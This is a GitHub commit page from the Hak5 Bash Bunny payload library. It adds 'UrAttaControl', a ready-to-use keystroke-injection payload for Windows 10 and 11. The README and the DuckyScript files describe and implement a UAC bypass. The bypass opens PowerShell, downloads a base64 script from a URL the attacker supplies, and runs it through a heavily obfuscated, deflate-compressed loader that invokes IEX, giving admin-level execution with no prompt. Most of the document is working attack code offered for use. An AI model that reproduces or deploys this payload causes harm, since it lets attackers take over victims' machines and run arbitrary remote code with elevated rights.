hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload (#524)

Browse Source
This commit is contained in:
I-Am-Jakoby
2022-05-17 16:35:51 -05:00
committed by GitHub
parent dfe52e6a5c
commit 791cc4e1aa
3 changed files with 155 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

104
payloads/library/execution/-BB-UrAttaControl/README.md Normal file
View File

@@ -0,0 +1,104 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# UrAttaControl
A script used to open an elevated powershell console and execute admin level commands
## Description
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
This script will use IEX to download a base64 script to the $Payload variable
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
script saved in the $Payload variable
This payload completely bypasses the UAC and will run any admin level script without a prompt
You can use this function I wrote to convert your .ps1 sscripts to Base64
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

30
payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt Normal file
View File

@@ -0,0 +1,30 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
SHIFT ENTER
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
SHIFT ENTER
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER

21
payloads/library/execution/-BB-UrAttaControl/payload.txt Normal file
View File

@@ -0,0 +1,21 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/UrAttaControl.txt